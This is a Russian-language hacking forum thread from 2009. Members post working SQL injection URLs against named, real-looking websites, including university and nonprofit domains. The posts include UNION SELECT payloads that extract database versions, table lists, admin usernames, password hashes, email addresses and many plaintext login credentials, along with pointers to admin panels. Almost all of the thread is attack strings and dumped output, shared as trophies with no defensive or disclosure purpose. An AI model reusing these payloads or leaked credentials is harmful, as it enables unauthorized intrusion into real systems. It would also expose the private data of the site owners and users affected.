HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.05.2009, 19:10
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
С нами: 9316980

Репутация: 12
По умолчанию

www.sh2all.com

Код:
http://www.sh2all.com/down.php?id=-1098+union+select+1,concat_ws(0x0b,version(),user(),database()),3,4,5
Версия - 5.0.67-community
Юзер - sh2all_protect@localhost
БД - sh2all_protect


Табличка юзеры:

Код:
http://www.sh2all.com/down.php?id=-1098+union+select+1,concat_ws(0x0b,id,username,passhash,email),3,4,5+from+users
Код:
Ник - admin   
Хэш - e8438e60f23ca196598c540d2e5b6d4b   
Мыло - eng.m7mod@hotmail.com
Табличка админ:

Код:
http://www.sh2all.com/down.php?id=-1098+union+select+1,group_concat(0x0b,username,password),3,4,5+from+admin
Код:
locus:15963  
 
admin:password
Админка
Код:
http://www.sh2all.com/admin.php?act=login
 
Ответить с цитированием

  #2  
Старый 17.05.2009, 19:19
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Код:
http://www.keichanyaki.com/archive/index.php?catid=22&qid=-2+UnIoN+SeLEcT+version(),2,3
Код:
http://www.keichanyaki.com/archive/index.php?catid=22&qid=-2+UnIoN+SeLEcT+username,2,3+from+cfaq_admin_crm
Код:
http://www.keichanyaki.com/archive/index.php?catid=22&qid=-2+UnIoN+SeLEcT+password,2,3+from+cfaq_admin_crm
только, почему то ошибка..
 
Ответить с цитированием

  #3  
Старый 17.05.2009, 21:21
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

мой 100-ый пост хДДД
http://www.akl-ma.net/members/success_stories/showdetials.php?id=1+union+select+1,2,concat_ws(0x 3a,version(),user(),database()),4,5,6,7,8,9--

4.1.22-standard:aklmanet_akluser@localhost:aklmanet_akl
 
Ответить с цитированием

  #4  
Старый 17.05.2009, 21:41
ivanko.rus
Новичок
Регистрация: 05.05.2009
Сообщений: 13
С нами: 8957794

Репутация: 19
По умолчанию

http://www.latindex.unam.mx/larga.php?opcion=1&folio=9999999999+union+select+p assword+from+usuario+--+
PostgreSQL
 
Ответить с цитированием

  #5  
Старый 17.05.2009, 22:15
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

PR: 3

http://hedgie.eu/ma/me/place/NHindex.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9,10,11,12,3,14,15,16,17,18 ,19,20,21,22--&cal=2

4.1.22-standard:hedgius2_mamb1@localhost:hedgius2_mamb1

###############################################

http://www.ma-pa.org/content.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6--

5.0.32-Debian_7etch6:ma_pa_org@localhost:ma_pa_org

###########################################
прикольная скуля ))))) смареть в пути картинки которая не открывается ))увидите

http://ma-hepub.com/gallery_lists.php?gallery_ID=3&id=-1+union+s elect+1,2,vers ion(),4,5--

http://ma-hepub.com/gallery_lists.php?gallery_ID=3&id=-1+union+select+1,2,group_concat(table_name ),4,5+from+information_schem a.tables+group+by+table_s ema+ limit+1,1--

tables:
home,about,receipt,file,wmv,page,distributer,shopp ing_type,mycalendar,bullet,relations_news,iv,accou nt,reference,gallery,pictrue,download,system,news,
clients,sendnews,member,article,reference_type,gal lery_type,products,download_type,useronline,newsle tter,comment,shopping,menu,banner,relations,guestb ook,products_type,faq,users,od,contact,
shopping_reserve,monetary,banner_menu,relations_ar ticle

http://ma-hepub.com/gallery_lists.php?gallery_ID=3&id=-1+union+select+1,2,group_concat(concat_ws(0x3a,use rname,pa ssword)),4,5+ from+users --

users:

grich:392607,admin:admin,test:test,9grich:1234,tom :tom,jeab:240600,PpP:74123698,Kathy:3316600,johnny bravo:113249223,
champ29:29121984,jaxx1860:jaxx1860,beerkabpom:0470 03591,MAX:15621234,unicon13:379158,babydoy2526:123 456789

Последний раз редактировалось HAXTA4OK; 18.05.2009 в 08:58..
 
Ответить с цитированием

  #6  
Старый 18.05.2009, 15:49
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию

ПР5
http://www.mainepolicy.org/news/show.php?news_id=-259+union+select+1,concat(username,char(58),passwo rd,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14+fr om+users/*&category=1
Админку не нашёл((

Последний раз редактировалось DezMond™; 18.05.2009 в 17:58..
 
Ответить с цитированием

  #7  
Старый 18.05.2009, 20:28
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами: 9837719

Репутация: 466
По умолчанию

http://glastonburytrust.co.uk/news_detail.php?pID=-8+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8

Database Version: 5.0.67-community
Database name: glastonb_db
User name: glastonb_db@localhost

In database glastonb_db found table users
1 : name
2 : email
3 : password
4 : status
5 : university
 
Ответить с цитированием

  #8  
Старый 18.05.2009, 20:32
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию

ПР4
http://brml.technion.ac.il/publications.php?id=-3+union+select+1,version(),3,4,5+/*+
4.1.22-log
 
Ответить с цитированием

  #9  
Старый 18.05.2009, 22:38
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

http://pi.aq-central.com/roster.php?id=1+union+select+version()--

5.0.75-community-log

http://pi.aq-central.com/roster.php?id=1+union+select+group_concat(concat_w s (0x3a,usernam e,pass word))+from+use rs--

admin:admin,superJAYdude:baconbits1,Jason A. Churchill:888888,PositivePaul:FreeGeorgeSherrill,M arlin Man:Safari,DAMellen:dirtysocks


##############################################
PR 4

http://www.zeva.com.au/registry.php?id=-1'+u nion+select+1,2,3,4,5,versio n(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33+--+

5.0.67


http://www.zeva.com.au/registry.php?id=-1'+union+select+1,2,3,4,5,group_concat(table_name) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+from+information_sche ma.tables+group+by+table_schema+limit+4,1+--+

через лимиты берем таблы

Последний раз редактировалось HAXTA4OK; 18.05.2009 в 23:11..
 
Ответить с цитированием

  #10  
Старый 19.05.2009, 00:03
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию

http://www.strawtec.com.au/content.php?id=-5+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user name,password),10,11,12+from+users+--+&ch=FAQ
strawtecadmin:snowfall88
P.S. админка есть но пас не подходит((

http://www.austraumaconference.org/content.php?id=-2'+union+select+1,2,3,4,5,version()+--+
4.1.22
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.